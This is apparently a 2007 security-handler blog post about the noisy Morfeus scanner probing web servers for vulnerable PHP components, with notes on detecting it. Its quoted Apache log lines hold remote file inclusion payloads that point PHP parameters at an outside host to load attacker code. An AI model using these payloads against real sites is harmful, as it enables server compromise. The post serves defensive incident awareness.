So, I assume by now you all know it is the "Month of the PHP bugs" but besides the tons of PHP advisories what else have we been seeing?
Well, today fellow handler Jim Clausing started an interesting thread posting his Apache logs which contained lines upon lines of:
220.127.116.11 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://18.104.22.168/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
22.214.171.124 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://126.96.36.199/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
so, curious about Morfeus (which, incidentally, is an old tool) hitting my own systems I went off to check my own logs:
tempest:~$ grep php www-access.log | grep Morfeus | cut -f 1 -d' ' | sort -n | uniq
tempest:~$ grep php www-access.log | grep Morfeus | wc -l
Aside from the different host scanning, it is pretty clear that Morfeus has been on my boxes too.
First observation: Morfeus doesn't care about what you might have set your Apache ServerTokens to (which is still a good trick against Netcraft abusers but not against script kiddies). Mine are set to give nothing away (and no, PHP is not installed) but they still scanned me.
Second observation: this is such a "noisy" scan that Jim said that he had turned off the Bleeding Edge Snort signatures and therefore only caught it when he got an alert from OSSEC (an open-source HIDS). It is never good news when signatures are turned off because they are too noisy but, at least in this case, I think we can safely assume that Jim noticed the scans the first time round.
Third observation: if you are running a site with PHP this is not an enjoyable month...
Mar 21st 2007
1 decade ago